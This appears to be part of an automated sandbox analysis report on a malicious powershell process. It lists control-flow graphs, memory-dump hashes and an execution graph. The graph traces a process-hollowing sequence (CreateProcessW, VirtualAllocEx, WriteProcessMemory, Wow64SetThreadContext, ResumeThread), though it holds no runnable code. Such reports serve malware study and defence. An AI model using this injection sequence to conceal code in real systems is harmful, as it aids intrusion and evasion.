                                                                                                                                                          control_flow_graph 89 7ac1f40-7ac1f65 90 7ac2158-7ac21a2 89->90 91 7ac1f6b-7ac1f70 89->91 108 7ac21a8-7ac21ad 90->108 109 7ac2326-7ac2340 90->109 92 7ac1f88-7ac1f8c 91->92 93 7ac1f72-7ac1f78 91->93 97 7ac2108-7ac2112 92->97 98 7ac1f92-7ac1f94 92->98 94 7ac1f7c-7ac1f86 93->94 95 7ac1f7a 93->95 94->92 95->92 102 7ac2114-7ac211d 97->102 103 7ac2120-7ac2126 97->103 100 7ac1fa4 98->100 101 7ac1f96-7ac1fa2 98->101 104 7ac1fa6-7ac1fa8 100->104 101->104 105 7ac212c-7ac2138 103->105 106 7ac2128-7ac212a 103->106 104->97 112 7ac1fae-7ac1fcd 104->112 113 7ac213a-7ac2155 105->113 106->113 110 7ac21af-7ac21b5 108->110 111 7ac21c5-7ac21c9 108->111 122 7ac238a-7ac238b 109->122 123 7ac2342-7ac236a 109->123 114 7ac21b9-7ac21c3 110->114 115 7ac21b7 110->115 116 7ac21cf-7ac21d1 111->116 117 7ac22d8-7ac22e2 111->117 148 7ac1fdd 112->148 149 7ac1fcf-7ac1fdb 112->149 114->111 115->111 120 7ac21e1 116->120 121 7ac21d3-7ac21df 116->121 124 7ac22ef-7ac22f5 117->124 125 7ac22e4-7ac22ec 117->125 128 7ac21e3-7ac21e5 120->128 121->128 134 7ac238d-7ac2391 122->134 129 7ac2480-7ac24b5 123->129 130 7ac2370-7ac2375 123->130 132 7ac22fb-7ac2307 124->132 133 7ac22f7-7ac22f9 124->133 128->117 136 7ac21eb-7ac220a 128->136 152 7ac24b7-7ac24d9 129->152 153 7ac24e3-7ac24ed 129->153 130->134 137 7ac2377-7ac237d 130->137 139 7ac2309-7ac2323 132->139 133->139 140 7ac2397-7ac2399 134->140 141 7ac2432-7ac243c 134->141 182 7ac220c-7ac2218 136->182 183 7ac221a 136->183 146 7ac237f 137->146 147 7ac2381 137->147 142 7ac23a9 140->142 143 7ac239b-7ac23a7 140->143 144 7ac243e-7ac2446 141->144 145 7ac2449-7ac244f 141->145 155 7ac23ab-7ac23ad 142->155 143->155 156 7ac2455-7ac2461 145->156 157 7ac2451-7ac2453 145->157 146->134 147->122 159 7ac1fdf-7ac1fe1 148->159 149->159 194 7ac252d-7ac2556 152->194 195 7ac24db-7ac24e0 152->195 162 7ac24ef-7ac24f4 153->162 163 7ac24f7-7ac24fd 153->163 155->141 160 7ac23b3-7ac23b5 155->160 161 7ac2463-7ac247d 156->161 157->161 159->97 164 7ac1fe7-7ac1fee 159->164 166 7ac23cf-7ac23d6 160->166 167 7ac23b7-7ac23bd 160->167 170 7ac24ff-7ac2501 163->170 171 7ac2503-7ac250f 163->171 164->90 173 7ac1ff4-7ac1ff9 164->173 178 7ac23ee-7ac242f 166->178 179 7ac23d8-7ac23de 166->179 176 7ac23bf 167->176 177 7ac23c1-7ac23cd 167->177 181 7ac2511-7ac252a 170->181 171->181 174 7ac1ffb-7ac2001 173->174 175 7ac2011-7ac2020 173->175 185 7ac2005-7ac200f 174->185 186 7ac2003 174->186 175->97 199 7ac2026-7ac2044 175->199 176->166 177->166 189 7ac23e0 179->189 190 7ac23e2-7ac23ec 179->190 187 7ac221c-7ac221e 182->187 183->187 185->175 186->175 187->117 197 7ac2224-7ac225b 187->197 189->178 190->178 208 7ac2558-7ac257e 194->208 209 7ac2585-7ac25b4 194->209 213 7ac225d-7ac2263 197->213 214 7ac2275-7ac227c 197->214 199->97 212 7ac204a-7ac206f 199->212 208->209 217 7ac25ed-7ac25f7 209->217 218 7ac25b6-7ac25d3 209->218 212->97 239 7ac2075-7ac207c 212->239 219 7ac2265 213->219 220 7ac2267-7ac2273 213->220 221 7ac227e-7ac2284 214->221 222 7ac2294-7ac22d5 214->222 224 7ac25f9-7ac25fd 217->224 225 7ac2600-7ac2606 217->225 235 7ac263d-7ac2642 218->235 236 7ac25d5-7ac25e7 218->236 219->214 220->214 226 7ac2288-7ac2292 221->226 227 7ac2286 221->227 232 7ac260c-7ac2618 225->232 233 7ac2608-7ac260a 225->233 226->222 227->222 238 7ac261a-7ac263a 232->238 233->238 235->236 236->217 240 7ac207e-7ac2099 239->240 241 7ac20c2-7ac20f5 239->241 248 7ac209b-7ac20a1 240->248 249 7ac20b3-7ac20b7 240->249 255 7ac20fc-7ac2105 241->255 250 7ac20a5-7ac20b1 248->250 251 7ac20a3 248->251 253 7ac20be-7ac20c0 249->253 250->249 251->249 253->255
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2201675380.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_7ac0000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 640300c4618256d38ab7456b99cf0f1d62f638d7478c097fe7c9ccdcb296522f
                                                                                                                                                          • Instruction ID: 92b62c51fb43265aee59cee3bcef66e31eeaca06edf0c38f3b60aa0c27b5791f
                                                                                                                                                          • Opcode Fuzzy Hash: 640300c4618256d38ab7456b99cf0f1d62f638d7478c097fe7c9ccdcb296522f
                                                                                                                                                          • Instruction Fuzzy Hash: 521237B1B04356EFDB15DB78881076ABBA6AFD2214F14807FD655CB2C2DB31C942C7A2

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 260 7ac4610-7ac463b 261 7ac4641-7ac4646 260->261 262 7ac4af2-7ac4b25 260->262 263 7ac465e-7ac4663 261->263 264 7ac4648-7ac464e 261->264 270 7ac4b35 262->270 271 7ac4b27-7ac4b33 262->271 268 7ac4665-7ac4671 263->268 269 7ac4673 263->269 265 7ac4650 264->265 266 7ac4652-7ac465c 264->266 265->263 266->263 272 7ac4675-7ac4677 268->272 269->272 274 7ac4b37-7ac4b39 270->274 271->274 275 7ac467d-7ac4687 272->275 276 7ac4a93-7ac4a9d 272->276 280 7ac4b7b-7ac4b85 274->280 281 7ac4b3b-7ac4b42 274->281 275->262 277 7ac468d-7ac4692 275->277 278 7ac4a9f-7ac4aa8 276->278 279 7ac4aab-7ac4ab1 276->279 285 7ac46aa-7ac46b8 277->285 286 7ac4694-7ac469a 277->286 282 7ac4ab7-7ac4ac3 279->282 283 7ac4ab3-7ac4ab5 279->283 287 7ac4b8e-7ac4b94 280->287 288 7ac4b87-7ac4b8b 280->288 281->280 284 7ac4b44-7ac4b61 281->284 289 7ac4ac5-7ac4aef 282->289 283->289 298 7ac4bc9-7ac4bce 284->298 299 7ac4b63-7ac4b75 284->299 285->276 302 7ac46be-7ac46dd 285->302 290 7ac469c 286->290 291 7ac469e-7ac46a8 286->291 292 7ac4b9a-7ac4ba6 287->292 293 7ac4b96-7ac4b98 287->293 290->285 291->285 297 7ac4ba8-7ac4bc6 292->297 293->297 298->299 299->280 302->276 310 7ac46e3-7ac46ed 302->310 310->262 311 7ac46f3-7ac46f8 310->311 312 7ac46fa-7ac4700 311->312 313 7ac4710-7ac4714 311->313 314 7ac4704-7ac470e 312->314 315 7ac4702 312->315 313->276 316 7ac471a-7ac471e 313->316 314->313 315->313 316->276 317 7ac4724-7ac4728 316->317 317->276 319 7ac472e-7ac473e 317->319 320 7ac4744-7ac476b 319->320 321 7ac47c6-7ac4815 319->321 326 7ac476d-7ac4773 320->326 327 7ac4785-7ac47b3 320->327 338 7ac481c-7ac482f 321->338 329 7ac4775 326->329 330 7ac4777-7ac4783 326->330 336 7ac47b5-7ac47b7 327->336 337 7ac47c1-7ac47c4 327->337 329->327 330->327 336->337 337->338 339 7ac4835-7ac485c 338->339 340 7ac48b7-7ac4906 338->340 345 7ac485e-7ac4864 339->345 346 7ac4876-7ac48a4 339->346 357 7ac490d-7ac4920 340->357 348 7ac4868-7ac4874 345->348 349 7ac4866 345->349 355 7ac48a6-7ac48a8 346->355 356 7ac48b2-7ac48b5 346->356 348->346 349->346 355->356 356->357 358 7ac49a8-7ac49f7 357->358 359 7ac4926-7ac494d 357->359 376 7ac49fe-7ac4a2c 358->376 364 7ac494f-7ac4955 359->364 365 7ac4967-7ac4995 359->365 366 7ac4959-7ac4965 364->366 367 7ac4957 364->367 374 7ac4997-7ac4999 365->374 375 7ac49a3-7ac49a6 365->375 366->365 367->365 374->375 375->376 381 7ac4a2f call 5111c00 376->381 382 7ac4a2f call 5117c45 376->382 383 7ac4a2f call 5117a18 376->383 384 7ac4a2f call 5117a08 376->384 379 7ac4a34-7ac4a90 381->379 382->379 383->379 384->379
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2201675380.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_7ac0000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2ee3442743b4582525ac37bffb3e598bdb1dac56b9af05b53b8cc925b5abc1e6
                                                                                                                                                          • Instruction ID: 4aa976376c15ad8438c496fe2baa4deaa6958bb4468f14426f1ee8fb970c3847
                                                                                                                                                          • Opcode Fuzzy Hash: 2ee3442743b4582525ac37bffb3e598bdb1dac56b9af05b53b8cc925b5abc1e6
                                                                                                                                                          • Instruction Fuzzy Hash: 6DE1F1B0B00285EFDB14DBA8D824B6ABFA6EFC9710F24806DE9159B344DB71DC41CB95

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 530 7ac45f4-7ac463b 532 7ac4641-7ac4646 530->532 533 7ac4af2-7ac4b25 530->533 534 7ac465e-7ac4663 532->534 535 7ac4648-7ac464e 532->535 541 7ac4b35 533->541 542 7ac4b27-7ac4b33 533->542 539 7ac4665-7ac4671 534->539 540 7ac4673 534->540 536 7ac4650 535->536 537 7ac4652-7ac465c 535->537 536->534 537->534 543 7ac4675-7ac4677 539->543 540->543 545 7ac4b37-7ac4b39 541->545 542->545 546 7ac467d-7ac4687 543->546 547 7ac4a93-7ac4a9d 543->547 551 7ac4b7b-7ac4b85 545->551 552 7ac4b3b-7ac4b42 545->552 546->533 548 7ac468d-7ac4692 546->548 549 7ac4a9f-7ac4aa8 547->549 550 7ac4aab-7ac4ab1 547->550 556 7ac46aa-7ac46b8 548->556 557 7ac4694-7ac469a 548->557 553 7ac4ab7-7ac4ac3 550->553 554 7ac4ab3-7ac4ab5 550->554 558 7ac4b8e-7ac4b94 551->558 559 7ac4b87-7ac4b8b 551->559 552->551 555 7ac4b44-7ac4b61 552->555 560 7ac4ac5-7ac4aef 553->560 554->560 569 7ac4bc9-7ac4bce 555->569 570 7ac4b63-7ac4b75 555->570 556->547 573 7ac46be-7ac46dd 556->573 561 7ac469c 557->561 562 7ac469e-7ac46a8 557->562 563 7ac4b9a-7ac4ba6 558->563 564 7ac4b96-7ac4b98 558->564 561->556 562->556 568 7ac4ba8-7ac4bc6 563->568 564->568 569->570 570->551 573->547 581 7ac46e3-7ac46ed 573->581 581->533 582 7ac46f3-7ac46f8 581->582 583 7ac46fa-7ac4700 582->583 584 7ac4710-7ac4714 582->584 585 7ac4704-7ac470e 583->585 586 7ac4702 583->586 584->547 587 7ac471a-7ac471e 584->587 585->584 586->584 587->547 588 7ac4724-7ac4728 587->588 588->547 590 7ac472e-7ac473e 588->590 591 7ac4744-7ac476b 590->591 592 7ac47c6-7ac4815 590->592 597 7ac476d-7ac4773 591->597 598 7ac4785-7ac47b3 591->598 609 7ac481c-7ac482f 592->609 600 7ac4775 597->600 601 7ac4777-7ac4783 597->601 607 7ac47b5-7ac47b7 598->607 608 7ac47c1-7ac47c4 598->608 600->598 601->598 607->608 608->609 610 7ac4835-7ac485c 609->610 611 7ac48b7-7ac4906 609->611 616 7ac485e-7ac4864 610->616 617 7ac4876-7ac48a4 610->617 628 7ac490d-7ac4920 611->628 619 7ac4868-7ac4874 616->619 620 7ac4866 616->620 626 7ac48a6-7ac48a8 617->626 627 7ac48b2-7ac48b5 617->627 619->617 620->617 626->627 627->628 629 7ac49a8-7ac49f7 628->629 630 7ac4926-7ac494d 628->630 647 7ac49fe-7ac4a2c 629->647 635 7ac494f-7ac4955 630->635 636 7ac4967-7ac4995 630->636 637 7ac4959-7ac4965 635->637 638 7ac4957 635->638 645 7ac4997-7ac4999 636->645 646 7ac49a3-7ac49a6 636->646 637->636 638->636 645->646 646->647 652 7ac4a2f call 5111c00 647->652 653 7ac4a2f call 5117c45 647->653 654 7ac4a2f call 5117a18 647->654 655 7ac4a2f call 5117a08 647->655 650 7ac4a34-7ac4a90 652->650 653->650 654->650 655->650
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2201675380.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_7ac0000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4ad825963d924e940976c8a19ded98fcdc36d05ab6c80c950945d503a53e9b3c
                                                                                                                                                          • Instruction ID: cd2fad7cbb07ac359ee55f22717538042b2f967d68e7416421c6487054ced646
                                                                                                                                                          • Opcode Fuzzy Hash: 4ad825963d924e940976c8a19ded98fcdc36d05ab6c80c950945d503a53e9b3c
                                                                                                                                                          • Instruction Fuzzy Hash: CB91A3B0A00285AFDB14CF58C460B69BBB2FFC9714F19806DE925AB354D771EC41CB99

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 742 7ac04f8-7ac050a 743 7ac05ca-7ac05fd 742->743 744 7ac0510-7ac0521 742->744 753 7ac05ff-7ac063e 743->753 754 7ac066b-7ac0675 743->754 747 7ac053b-7ac0558 744->747 748 7ac0523-7ac0529 744->748 747->743 756 7ac055a-7ac057c 747->756 749 7ac052d-7ac0539 748->749 750 7ac052b 748->750 749->747 750->747 774 7ac06bb-7ac06c0 753->774 775 7ac0640-7ac064e 753->775 757 7ac0677-7ac067d 754->757 758 7ac0680-7ac0686 754->758 766 7ac057e-7ac0584 756->766 767 7ac0596-7ac05ae 756->767 760 7ac068c-7ac0698 758->760 761 7ac0688-7ac068a 758->761 763 7ac069a-7ac06b8 760->763 761->763 769 7ac0588-7ac0594 766->769 770 7ac0586 766->770 777 7ac05bc-7ac05c7 767->777 778 7ac05b0-7ac05b2 767->778 769->767 770->767 774->775 781 7ac0656-7ac0665 775->781 778->777 781->754
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2201675380.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_7ac0000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6f4df4cce217a1fd2458ccd9d24c18945cd6c8c3b5835d4b220be6ec77111bf0
                                                                                                                                                          • Instruction ID: 3be50e8451df8888efb06e6c699738e3db842016a2b184339513f5b6d28d384f
                                                                                                                                                          • Opcode Fuzzy Hash: 6f4df4cce217a1fd2458ccd9d24c18945cd6c8c3b5835d4b220be6ec77111bf0
                                                                                                                                                          • Instruction Fuzzy Hash: 5A5116B1B00219EFDB109B688C10B2BBBE5AFC5714F14C42EE655DF385CA71DC4687A2

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 871 7ac1f24-7ac1f65 873 7ac2158-7ac21a2 871->873 874 7ac1f6b-7ac1f70 871->874 891 7ac21a8-7ac21ad 873->891 892 7ac2326-7ac2340 873->892 875 7ac1f88-7ac1f8c 874->875 876 7ac1f72-7ac1f78 874->876 880 7ac2108-7ac2112 875->880 881 7ac1f92-7ac1f94 875->881 877 7ac1f7c-7ac1f86 876->877 878 7ac1f7a 876->878 877->875 878->875 885 7ac2114-7ac211d 880->885 886 7ac2120-7ac2126 880->886 883 7ac1fa4 881->883 884 7ac1f96-7ac1fa2 881->884 887 7ac1fa6-7ac1fa8 883->887 884->887 888 7ac212c-7ac2138 886->888 889 7ac2128-7ac212a 886->889 887->880 895 7ac1fae-7ac1fcd 887->895 896 7ac213a-7ac2155 888->896 889->896 893 7ac21af-7ac21b5 891->893 894 7ac21c5-7ac21c9 891->894 905 7ac238a-7ac238b 892->905 906 7ac2342-7ac236a 892->906 897 7ac21b9-7ac21c3 893->897 898 7ac21b7 893->898 899 7ac21cf-7ac21d1 894->899 900 7ac22d8-7ac22e2 894->900 931 7ac1fdd 895->931 932 7ac1fcf-7ac1fdb 895->932 897->894 898->894 903 7ac21e1 899->903 904 7ac21d3-7ac21df 899->904 907 7ac22ef-7ac22f5 900->907 908 7ac22e4-7ac22ec 900->908 911 7ac21e3-7ac21e5 903->911 904->911 917 7ac238d-7ac2391 905->917 912 7ac2480-7ac24b5 906->912 913 7ac2370-7ac2375 906->913 915 7ac22fb-7ac2307 907->915 916 7ac22f7-7ac22f9 907->916 911->900 919 7ac21eb-7ac220a 911->919 935 7ac24b7-7ac24d9 912->935 936 7ac24e3-7ac24ed 912->936 913->917 920 7ac2377-7ac237d 913->920 922 7ac2309-7ac2323 915->922 916->922 923 7ac2397-7ac2399 917->923 924 7ac2432-7ac243c 917->924 965 7ac220c-7ac2218 919->965 966 7ac221a 919->966 929 7ac237f 920->929 930 7ac2381 920->930 925 7ac23a9 923->925 926 7ac239b-7ac23a7 923->926 927 7ac243e-7ac2446 924->927 928 7ac2449-7ac244f 924->928 938 7ac23ab-7ac23ad 925->938 926->938 939 7ac2455-7ac2461 928->939 940 7ac2451-7ac2453 928->940 929->917 930->905 942 7ac1fdf-7ac1fe1 931->942 932->942 977 7ac252d-7ac2556 935->977 978 7ac24db-7ac24e0 935->978 945 7ac24ef-7ac24f4 936->945 946 7ac24f7-7ac24fd 936->946 938->924 943 7ac23b3-7ac23b5 938->943 944 7ac2463-7ac247d 939->944 940->944 942->880 947 7ac1fe7-7ac1fee 942->947 949 7ac23cf-7ac23d6 943->949 950 7ac23b7-7ac23bd 943->950 953 7ac24ff-7ac2501 946->953 954 7ac2503-7ac250f 946->954 947->873 956 7ac1ff4-7ac1ff9 947->956 961 7ac23ee-7ac242f 949->961 962 7ac23d8-7ac23de 949->962 959 7ac23bf 950->959 960 7ac23c1-7ac23cd 950->960 964 7ac2511-7ac252a 953->964 954->964 957 7ac1ffb-7ac2001 956->957 958 7ac2011-7ac2020 956->958 968 7ac2005-7ac200f 957->968 969 7ac2003 957->969 958->880 982 7ac2026-7ac2044 958->982 959->949 960->949 972 7ac23e0 962->972 973 7ac23e2-7ac23ec 962->973 970 7ac221c-7ac221e 965->970 966->970 968->958 969->958 970->900 980 7ac2224-7ac225b 970->980 972->961 973->961 991 7ac2558-7ac257e 977->991 992 7ac2585-7ac25b4 977->992 996 7ac225d-7ac2263 980->996 997 7ac2275-7ac227c 980->997 982->880 995 7ac204a-7ac206f 982->995 991->992 1000 7ac25ed-7ac25f7 992->1000 1001 7ac25b6-7ac25d3 992->1001 995->880 1022 7ac2075-7ac207c 995->1022 1002 7ac2265 996->1002 1003 7ac2267-7ac2273 996->1003 1004 7ac227e-7ac2284 997->1004 1005 7ac2294-7ac22d5 997->1005 1007 7ac25f9-7ac25fd 1000->1007 1008 7ac2600-7ac2606 1000->1008 1018 7ac263d-7ac2642 1001->1018 1019 7ac25d5-7ac25e7 1001->1019 1002->997 1003->997 1009 7ac2288-7ac2292 1004->1009 1010 7ac2286 1004->1010 1015 7ac260c-7ac2618 1008->1015 1016 7ac2608-7ac260a 1008->1016 1009->1005 1010->1005 1021 7ac261a-7ac263a 1015->1021 1016->1021 1018->1019 1019->1000 1023 7ac207e-7ac2099 1022->1023 1024 7ac20c2-7ac20f5 1022->1024 1031 7ac209b-7ac20a1 1023->1031 1032 7ac20b3-7ac20b7 1023->1032 1038 7ac20fc-7ac2105 1024->1038 1033 7ac20a5-7ac20b1 1031->1033 1034 7ac20a3 1031->1034 1036 7ac20be-7ac20c0 1032->1036 1033->1032 1034->1032 1036->1038
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2201675380.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_7ac0000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e8c50a5e2268406f81c8c3b06f4fc16427c0d146f7c61a49a93fbc850a95a7c0
                                                                                                                                                          • Instruction ID: 7bdeaedb334c65f42015880a97d09beb9b19b5daecfcc0ff618abd687dd3ffbb
                                                                                                                                                          • Opcode Fuzzy Hash: e8c50a5e2268406f81c8c3b06f4fc16427c0d146f7c61a49a93fbc850a95a7c0
                                                                                                                                                          • Instruction Fuzzy Hash: B041E6F1A00306EFDB21DF1888417697BA5AFC5610F1580BEDA109B2D2D731D941C7A2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2197571607.0000000004F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F8D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_4f8d000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f4f4e8ea2e880c15dabb399ad826f0b23a59788d72031da90e4ca5d2f2f28569
                                                                                                                                                          • Instruction ID: 151d9887ec096dc2f006f813d474d1867f0585656bae40940e5f4575774b5b9f
                                                                                                                                                          • Opcode Fuzzy Hash: f4f4e8ea2e880c15dabb399ad826f0b23a59788d72031da90e4ca5d2f2f28569
                                                                                                                                                          • Instruction Fuzzy Hash: AF012B72905344DAE7106E25ED80B67BF98DF41324F08C01EDD084F2CAC7B9A446C6B1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2197571607.0000000004F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F8D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_4f8d000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9a13dfba8eba1459e57e3cb75ab455b7f8e4b5ba63b0bf8d4571b4e04cef998b
                                                                                                                                                          • Instruction ID: 360f7fcc8baf5771b8b531a239078a15726608dfaf33595bfa456fd3a5bd8c51
                                                                                                                                                          • Opcode Fuzzy Hash: 9a13dfba8eba1459e57e3cb75ab455b7f8e4b5ba63b0bf8d4571b4e04cef998b
                                                                                                                                                          • Instruction Fuzzy Hash: C6014C6240E3C49EE7129B259D94B52BFB4DF43224F1980DBD9888F1A7C269584AC772

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:5.8%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:71.9%
                                                                                                                                                          Total number of Nodes:32
                                                                                                                                                          Total number of Limit Nodes:2
                                                                                                                                                          execution_graph 8160 4a97d67 8161 4a97d51 8160->8161 8163 4a97e0d 8161->8163 8165 4a98738 8161->8165 8166 4a98742 8165->8166 8167 4a97e65 8165->8167 8169 4a987b0 8166->8169 8170 4a9882d 8169->8170 8176 4a98eb4 8170->8176 8193 4a972f0 8170->8193 8172 4a99095 CreateProcessW 8174 4a99109 8172->8174 8173 4a988b8 8175 4a972fc Wow64SetThreadContext 8173->8175 8173->8176 8178 4a98923 8175->8178 8176->8172 8177 4a98da8 8176->8177 8177->8167 8178->8176 8178->8177 8179 4a98a36 VirtualAllocEx 8178->8179 8180 4a98a83 8179->8180 8180->8176 8181 4a98ad1 VirtualAllocEx 8180->8181 8183 4a98b25 8180->8183 8181->8183 8182 4a97314 WriteProcessMemory 8184 4a98b6f 8182->8184 8183->8176 8183->8177 8183->8182 8184->8176 8184->8177 8185 4a98cb9 8184->8185 8192 4a97314 WriteProcessMemory 8184->8192 8185->8176 8186 4a97314 WriteProcessMemory 8185->8186 8187 4a98ce2 8186->8187 8187->8176 8187->8177 8188 4a97320 Wow64SetThreadContext 8187->8188 8189 4a98d57 8188->8189 8189->8176 8190 4a98d5f 8189->8190 8190->8177 8191 4a98d68 ResumeThread 8190->8191 8191->8177 8192->8184 8194 4a98fb0 CreateProcessW 8193->8194 8196 4a99109 8194->8196

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 4a987b0-4a98861 4 4a98f99-4a99029 0->4 5 4a98867-4a98877 0->5 10 4a9902b-4a9902e 4->10 11 4a99031-4a99038 4->11 8 4a98879-4a9887e 5->8 9 4a98880 5->9 12 4a98882-4a98884 8->12 9->12 10->11 13 4a9903a-4a99040 11->13 14 4a99043-4a99059 11->14 17 4a9889b-4a988ba call 4a972f0 12->17 18 4a98886-4a98899 12->18 13->14 15 4a9905b-4a99061 14->15 16 4a99064-4a99107 CreateProcessW 14->16 15->16 25 4a99109-4a9910f 16->25 26 4a99110-4a99188 16->26 23 4a988bc-4a988c1 17->23 24 4a988c3 17->24 18->17 27 4a988c5-4a988c7 23->27 24->27 25->26 44 4a9919a-4a991a1 26->44 45 4a9918a-4a99190 26->45 28 4a988cd-4a988e2 27->28 29 4a98f0f-4a98f22 27->29 35 4a988e8-4a9890c 28->35 36 4a98f0a 28->36 40 4a98f29-4a98f3f 29->40 35->40 47 4a98912-4a98925 call 4a972fc 35->47 36->29 40->4 55 4a98f41-4a98f4b 40->55 48 4a991b8 44->48 49 4a991a3-4a991b2 44->49 45->44 56 4a9892b-4a98932 47->56 57 4a98ead-4a98eaf 47->57 54 4a991b9 48->54 49->48 54->54 64 4a98f4d-4a98f54 55->64 65 4a98f56-4a98f58 55->65 58 4a98938-4a98942 56->58 59 4a98e93-4a98ea6 56->59 58->40 60 4a98948-4a98965 58->60 59->57 60->36 62 4a9896b-4a98985 call 4a97308 60->62 73 4a9898b-4a98992 62->73 74 4a98eb4 62->74 67 4a98f5a-4a98f5e 64->67 65->67 68 4a98f60 call 4a97f74 67->68 69 4a98f65-4a98f72 67->69 68->69 84 4a98f79-4a98f96 69->84 76 4a98e79-4a98e8c 73->76 77 4a98998-4a989a1 73->77 80 4a98ebb 74->80 76->59 78 4a98a0c-4a98a12 77->78 79 4a989a3-4a989e7 77->79 78->36 81 4a98a18-4a98a28 78->81 88 4a989e9-4a989ef 79->88 89 4a989f0-4a989fc 79->89 86 4a98ec5 80->86 81->36 91 4a98a2e-4a98a81 VirtualAllocEx 81->91 92 4a98ecc 86->92 88->89 89->80 93 4a98a02-4a98a06 89->93 98 4a98a8a-4a98aa8 91->98 99 4a98a83-4a98a89 91->99 97 4a98ed3 92->97 93->78 95 4a98e5f-4a98e72 93->95 95->76 101 4a98eda 97->101 98->86 102 4a98aae-4a98ab5 98->102 99->98 107 4a98ee1 101->107 105 4a98abb-4a98ac2 102->105 106 4a98b3c-4a98b43 102->106 105->92 109 4a98ac8-4a98acf 105->109 106->97 108 4a98b49-4a98b50 106->108 113 4a98eeb 107->113 110 4a98e45-4a98e58 108->110 111 4a98b56-4a98b71 call 4a97314 108->111 109->106 112 4a98ad1-4a98b23 VirtualAllocEx 109->112 110->95 111->101 121 4a98b77-4a98b7e 111->121 115 4a98b2c-4a98b36 112->115 116 4a98b25-4a98b2b 112->116 120 4a98ef2 113->120 115->106 116->115 125 4a98ef9 120->125 123 4a98e2b-4a98e3e 121->123 124 4a98b84-4a98b8d 121->124 123->110 124->36 126 4a98b93-4a98b99 124->126 129 4a98f03 125->129 126->36 128 4a98b9f-4a98baa 126->128 128->36 132 4a98bb0-4a98bb6 128->132 129->36 133 4a98cb9-4a98cca 132->133 134 4a98bbc-4a98bc1 132->134 133->36 138 4a98cd0-4a98ce4 call 4a97314 133->138 134->36 135 4a98bc7-4a98bda 134->135 135->36 139 4a98be0-4a98bf3 135->139 138->120 143 4a98cea-4a98cf1 138->143 139->36 144 4a98bf9-4a98c0e 139->144 145 4a98df7-4a98e0a 143->145 146 4a98cf7-4a98cfd 143->146 144->107 151 4a98c14-4a98c18 144->151 160 4a98e11-4a98e24 145->160 146->36 147 4a98d03-4a98d14 146->147 147->125 153 4a98d1a-4a98d1e 147->153 154 4a98c9f-4a98ca2 151->154 155 4a98c1e-4a98c27 151->155 156 4a98d29-4a98d31 153->156 157 4a98d20-4a98d23 153->157 154->36 158 4a98ca8-4a98cab 154->158 155->36 159 4a98c2d-4a98c30 155->159 156->36 161 4a98d37-4a98d41 156->161 157->156 158->36 162 4a98cb1-4a98cb3 158->162 159->36 163 4a98c36-4a98c66 159->163 160->123 161->40 164 4a98d47-4a98d59 call 4a97320 161->164 162->133 162->134 163->36 